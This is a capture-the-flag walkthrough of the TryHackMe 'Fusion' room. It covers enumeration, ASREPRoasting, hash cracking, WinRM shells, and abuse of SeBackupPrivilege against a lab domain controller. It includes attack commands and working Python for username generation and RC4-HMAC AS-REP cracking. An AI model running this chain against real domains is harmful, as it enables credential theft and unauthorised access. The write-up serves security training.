Platform: TryHackMe
Difficulty: Easy
Reconnaissance
Nmap
nmap -sC -sV -A MACHINE-IP -oA nmap
The scan immediately tells us this is a Domain Controller — port 88 (Kerberos), 389/3268 (LDAP), and 5985 (WinRM) are all open, with the domain name fusion.corp leaking out of the LDAP banner. Port 80 is also open, which is less common on a DC and worth investigating separately.
| Port | Service |
|---|---|
| 53 | DNS (Simple DNS Plus) |
| 80 | HTTP (Microsoft IIS 10.0) |
| 88 | Kerberos |
| 389 / 3268 | LDAP (domain: fusion.corp) |
| 445 | SMB (signing required) |
| 3389 | RDP |
| 5985 | WinRM |
DC hostname: Fusion-DC.fusion.corp
SMB Null Session
With SMB open and signing required, the first thing to check is whether null authentication is permitted — it occasionally gives us share access or user enumeration for free.
nxc smb MACHINE-IP -u '' -p ''
Null auth is accepted, but share enumeration comes back STATUS_ACCESS_DENIED. Dead end for now, but confirming the domain name (fusion.corp) is useful for later Kerberos attacks.
Web Enumeration (Port 80)
Browsing to port 80 shows a standard IIS-hosted "eBusiness" Bootstrap template. The Team page is immediately interesting: it lists employee full names with job titles, and in an AD environment those names usually map onto domain usernames through a predictable convention.
Directory Brute Force
Before digging into the HTML, it's worth checking whether IIS is exposing anything else on the filesystem.
ffuf -u http://MACHINE-IP/FUZZ -w /usr/share/wordlists/dirb/big.txt -ac
/backup/ returns a 301 and, crucially, has directory listing enabled. This is a misconfiguration — IIS should never serve directory listings in production, especially not from a path named backup.
employees.ods
Inside /backup/ is a single file: employees.ods. Opening it reveals a spreadsheet with employee names and their corresponding domain usernames. The naming convention is consistent: first initial followed by surname.
| Name | Username |
|---|---|
| Jhon Mickel | jmickel |
| Andrew Arnold | aarnold |
| Lellien Linda | llinda |
| Jhon Powel | jpowel |
| Dominique Vroslav | dvroslav |
| Thomas Jeffersonn | tjefferson |
| Nola Maurin | nmaurin |
| Mira Ladovic | mladovic |
| Larry Parker | lparker |
| Kay Garland | kgarland |
| Diana Pertersen | dpertersen |
This gives us a wordlist of 11 domain usernames. The next step is to validate which of these actually exist in AD and whether any have weak Kerberos configurations.
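Had /backup/ not been exposed, the Team page alone would have given us names but no usernames. The following Python script is an added example and not part of the original writeup: it expands full names into candidate sAMAccountNames, putting the spreadsheet's first-initial-plus-surname convention first and adding the other conventions commonly seen in AD (those extra conventions are an assumption about other domains, not something this room uses). The names are the ones from the table above. Note that it produces `tjeffersonn` for "Thomas Jeffersonn" where the spreadsheet says `tjefferson`; a name as typed on a web page does not always spell the account, which is exactly why every candidate should be validated against the KDC rather than trusted.

```python
import re

# Constructed input: the Name column of employees.ods as shown in the writeup.
EMPLOYEES = [
    "Jhon Mickel", "Andrew Arnold", "Lellien Linda", "Jhon Powel",
    "Dominique Vroslav", "Thomas Jeffersonn", "Nola Maurin", "Mira Ladovic",
    "Larry Parker", "Kay Garland", "Diana Pertersen",
]


def split_name(full_name):
    """Return (first, last) in lowercase with non-letters stripped.

    Middle names are ignored; the last token is treated as the surname.
    """
    parts = [re.sub(r"[^a-z]", "", p.lower()) for p in full_name.split()]
    parts = [p for p in parts if p]
    if len(parts) < 2:
        raise ValueError(f"need at least a first and last name: {full_name!r}")
    return parts[0], parts[-1]


def candidates(full_name):
    """Candidate usernames for one person, most likely convention first."""
    first, last = split_name(full_name)
    return [
        first[0] + last,        # flast   (the convention in employees.ods)
        first + "." + last,     # first.last
        first + last,           # firstlast
        first + last[0],        # firstl
        last + first[0],        # lastf
        first[0] + "." + last,  # f.last
        first,                  # first name only
    ]


def build_wordlist(names):
    """Flatten and dedupe while keeping order, so the file diffs cleanly
    against kerbrute's output later."""
    seen, out = set(), []
    for name in names:
        for cand in candidates(name):
            if cand not in seen:
                seen.add(cand)
                out.append(cand)
    return out


if __name__ == "__main__":
    wordlist = build_wordlist(EMPLOYEES)
    with open("usernames.txt", "w") as fh:
        fh.write("\n".join(wordlist) + "\n")
    print(f"{len(wordlist)} candidates written to usernames.txt")
```

Feed the resulting usernames.txt to `kerbrute userenum` as in the next section; the KDC, not the generator, decides which candidates are real.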
Initial Access — ASREPRoasting (lparker)
Kerberos User Enumeration
With a list of candidate usernames and port 88 open, we can probe the KDC directly without credentials using kerbrute. Unlike LDAP enumeration, this doesn't require a valid session: kerbrute sends an AS-REQ with no pre-authentication data for each name, and the KDC answers KDC_ERR_C_PRINCIPAL_UNKNOWN for a nonexistent principal but KDC_ERR_PREAUTH_REQUIRED (or a full AS-REP, if pre-auth is disabled) for a real one. It is not quiet, though: every miss lands in the DC's Security log as event 4768 with failure code 0x6, which is a cheap detection for this technique.
kerbrute userenum -d fusion.corp --dc MACHINE-IP usernames.txt
Only one account comes back as valid: lparker@fusion.corp. More importantly, kerbrute also flags that this account has Kerberos pre-authentication disabled — the condition required for ASREPRoasting.
ASREPRoast
Normally the KDC refuses to issue anything until the client proves knowledge of the password by sending a timestamp encrypted with the user's key. When pre-authentication is disabled on an account, the KDC answers an AS-REQ for that principal straight away. The AS-REP's encrypted part is keyed from the user's password hash, so anyone can request one unauthenticated and run a dictionary attack against it offline.
impacket-GetNPUsers fusion.corp/lparker -dc-ip MACHINE-IP -no-pass
The KDC returns a $krb5asrep$23$ line: etype 23 is RC4-HMAC, keyed directly with lparker's NT hash. Save it to hash.txt.
Hash Cracking
The etype 23 (RC4-HMAC) hash is crackable with a standard wordlist attack. Its key is the NT hash itself, so each guess costs one MD4 plus a few HMAC-MD5 and RC4 operations. The AES etypes (17/18) derive the key with PBKDF2-HMAC-SHA1 over password and salt with 4096 iterations by default, which makes every guess thousands of times more expensive. Tooling such as GetNPUsers asks for RC4 explicitly, and the KDC obliges unless the account or domain policy forbids it, which many environments still allow for legacy compatibility.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Password cracked: [REDACTED]
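To show why the etype 23 line cracks so cheaply, here is an added Python example (not impacket or john code, and not part of the original writeup) that implements the RC4-HMAC verification john performs per guess, following RFC 4757 and the $krb5asrep$23$ line format. MD4 is implemented inline because hashlib on OpenSSL 3 often lacks it. Since no real hash from the room is reproduced here, the sample line is constructed by encrypting a dummy EncASRepPart body under a throwaway password, so the only thing "cracked" is our own sample; the principal name and password are assumptions for the demo.

```python
import hashlib
import hmac
import struct


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF


def md4(data):
    """RFC 1320 MD4, needed because the NT hash is MD4 over UTF-16LE."""
    msg = bytearray(data)
    msg.append(0x80)
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):  # round 1
            a = _rotl((a + F(b, c, d) + X[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2, word order 0,4,8,12,1,5,...
            k = (i % 4) * 4 + i // 4
            a = _rotl((a + G(b, c, d) + X[k] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a = _rotl((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        a, b = (a + aa) & 0xFFFFFFFF, (b + bb) & 0xFFFFFFFF
        c, d = (c + cc) & 0xFFFFFFFF, (d + dd) & 0xFFFFFFFF
    return struct.pack("<4I", a, b, c, d)


def rc4(key, data):
    """Plain RC4 keystream XOR; RFC 4757 uses it without discarding bytes."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def nt_hash(password):
    """NT hash = MD4(UTF-16LE(password)); this IS the etype 23 key."""
    return md4(password.encode("utf-16-le"))


def _k1(key):
    # RFC 4757: the AS-REP enc-part key usage (3) is mapped to T = 8.
    return hmac.new(key, struct.pack("<I", 8), hashlib.md5).digest()


def asrep_encrypt(password, body, confounder):
    """KDC side, for the demo only: build a $krb5asrep$23$ line like GetNPUsers prints."""
    k1 = _k1(nt_hash(password))
    edata = confounder + body
    checksum = hmac.new(k1, edata, hashlib.md5).digest()
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    return f"$krb5asrep$23$lparker@FUSION.CORP:{checksum.hex()}${rc4(k3, edata).hex()}"


def check_guess(hashline, guess):
    """One candidate password against one hash: MD4 + 3x HMAC-MD5 + one RC4 pass."""
    _, _, etype, rest = hashline.split("$", 3)
    if etype != "23":
        raise ValueError("only RC4-HMAC (etype 23) lines are handled here")
    _principal, enc = rest.split(":", 1)
    checksum_hex, edata_hex = enc.split("$")
    checksum, ciphertext = bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)
    k1 = _k1(nt_hash(guess))
    k3 = hmac.new(k1, checksum, hashlib.md5).digest()
    plaintext = rc4(k3, ciphertext)
    return hmac.compare_digest(hmac.new(k1, plaintext, hashlib.md5).digest(), checksum)


def crack(hashline, wordlist):
    for word in wordlist:
        if check_guess(hashline, word):
            return word
    return None


# Constructed sample: dummy ASN.1-looking EncASRepPart body, fixed confounder,
# throwaway password. Nothing here is a real hash from the room.
SAMPLE_HASH = asrep_encrypt("Summer2024!", b"\x79\x81\x9b\x30\x81\x98" + b"A" * 40, b"\x00" * 8)
SAMPLE_WORDLIST = ["password", "Welcome1", "Summer2024!", "fusion123"]

if __name__ == "__main__":
    print("cracked:", crack(SAMPLE_HASH, SAMPLE_WORDLIST))
```

Every line in `check_guess` runs once per candidate; with AES etypes the `nt_hash` step would be replaced by 4096 rounds of PBKDF2, which is the whole difference between a rockyou run finishing in seconds and in hours.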
WinRM — lparker
With valid credentials and WinRM open on port 5985, we get a shell directly.
evil-winrm -i MACHINE-IP -u lparker -p '[REDACTED]'
*Evil-WinRM* PS C:\Users\lparker\Desktop> type flag.txt
THM{REDACTED}
Lateral Movement — jmurphy (Cleartext Password in AD Comment)
As lparker, the first thing to do is understand the AD landscape — who else is on this machine, and what groups are they in. net user shows only a handful of accounts: Administrator, Guest, krbtgt, lparker, and jmurphy.
Checking jmurphy's full domain profile reveals something alarming:
net user jmurphy /domain
The Comment line (a free-text attribute on the AD user object that admins sometimes use for notes) contains the account's plaintext password. Passwords stashed in the description or comment attributes are a well-known AD misconfiguration and a common finding in real engagements, because those attributes are readable by any authenticated domain user. The account also belongs to Backup Operators and Remote Management Users, making it far more valuable than lparker.
evil-winrm -i MACHINE-IP -u jmurphy -p '[REDACTED]'
*Evil-WinRM* PS C:\Users\jmurphy\Desktop> type flag.txt
THM{REDACTED}
Privilege Escalation — SeBackupPrivilege → Administrator Flag
Before reaching for a typical privesc exploit, it's worth checking what privileges and group memberships this session actually has.
whoami /priv
whoami /groups
jmurphy holds SeBackupPrivilege and SeRestorePrivilege by virtue of being in Backup Operators. These two privileges are often overlooked but are extremely powerful: when a process whose token has SeBackupPrivilege enabled opens a file with FILE_FLAG_BACKUP_SEMANTICS, the kernel grants read access without evaluating the DACL. In practical terms, we can read any file on the filesystem regardless of ACLs, including files owned by Administrator (and SeRestorePrivilege gives the matching write side).
The cleanest way to exploit this via WinRM, where console-oriented tools such as diskshadow are awkward in the non-interactive shell, is robocopy with the /B flag, which opens files in backup mode and so uses backup semantics for us.
mkdir C:\tmp
robocopy "C:\Users\Administrator\Desktop" "C:\tmp" "flag.txt" /B /COPY:DAT
type C:\tmp\flag.txt
THM{REDACTED}
Note:
`diskshadow` was attempted for a VSS-based NTDS dump but exited immediately; it requires an interactive console, which WinRM doesn't provide, although it can also be driven with a script file via `diskshadow /s`, which is the usual route from a non-interactive shell. For the purposes of this room, direct file theft via `robocopy /B` is sufficient. In a real engagement, `SeBackupPrivilege` would also allow dumping the SAM and SYSTEM hives using `reg save` and extracting local credentials offline; for the domain credentials on a DC, the target is NTDS.dit, which is locked while AD is running and is normally reached through a VSS shadow copy.
Summary
| Step | Technique | Result |
|---|---|---|
| IIS dir listing | Open /backup/ on IIS | Leaked employees.ods with usernames |
| ASREPRoasting | GetNPUsers + john | lparker credentials |
| WinRM | evil-winrm | Shell as lparker, Flag 1 |
| AD enumeration | net user /domain | Plaintext password in jmurphy Comment |
| WinRM | evil-winrm | Shell as jmurphy, Flag 2 |
| SeBackupPrivilege | robocopy /B | Admin flag read |
Tools Used
| Tool | Purpose |
|---|---|
| nmap | Port and service enumeration |
| ffuf | Web directory brute force |
| enum4linux-ng | SMB/LDAP enumeration |
| NetExec (nxc) | SMB null session check |
| kerbrute | Kerberos username enumeration |
| impacket-GetNPUsers | ASREPRoast TGT request |
| john | Hash cracking |
| evil-winrm | WinRM shell |
| robocopy | SeBackupPrivilege file theft |
Key Vulnerabilities
| # | Vulnerability | Impact |
|---|---|---|
| 1 | IIS directory listing exposes employees.ods | Username enumeration |
| 2 | ASREPRoasting on lparker (no pre-auth required) | Credential theft |
| 3 | Plaintext password in AD user Comment field (jmurphy) | Lateral movement |
| 4 | jmurphy member of Backup Operators with SeBackupPrivilege | Admin file read via robocopy /B |
Attack Chain
IIS /backup/ → employees.ods → username list
→ kerbrute userenum → lparker valid
→ GetNPUsers ASREPRoast → crack TGT hash (john)
→ evil-winrm as lparker → flag 1
→ net user jmurphy /domain → plaintext password in Comment
→ evil-winrm as jmurphy (Backup Operators) → flag 2
→ SeBackupPrivilege + robocopy /B → Admin flag